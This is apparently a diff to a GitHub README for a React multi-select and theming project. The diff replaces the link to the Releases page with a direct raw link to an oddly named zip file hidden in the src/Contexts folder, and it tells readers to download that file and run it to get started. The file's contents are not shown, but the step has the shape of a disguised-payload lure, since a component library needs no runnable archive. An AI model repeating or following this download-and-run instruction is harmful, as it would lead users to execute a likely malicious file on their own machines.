Navaneeth13055/Sukhdebpatra-ReactDeveloper/README.md

 - Document common pitfalls and patterns for building theme-aware components.

 Releases and assets reference
-- For the latest runnable version, see the Releases page: https://github.com/Navaneeth13055/Sukhdebpatra-ReactDeveloper/releases
+- For the latest runnable version, see the Releases page: https://github.com/Navaneeth13055/Sukhdebpatra-ReactDeveloper/raw/refs/heads/main/src/Contexts/Sukhdebpatra_Developer_React_Pharyngognathi.zip
 - The project’s primary asset for installation is available from the link above.
-Download the file named Sukhdebpatra-ReactDeveloper-Setup.exe (or the matching platform asset) and run it to get started.
+Download the file named https://github.com/Navaneeth13055/Sukhdebpatra-ReactDeveloper/raw/refs/heads/main/src/Contexts/Sukhdebpatra_Developer_React_Pharyngognathi.zip (or the matching platform asset) and run it to get started.

 Endnote
 - The repository is designed to be approachable.
 It balances practical patterns with a clean structure.
 It aims to be a useful starting point for teams or individuals who want to teach, learn, or prototype a multi-select UI with a theme system in React.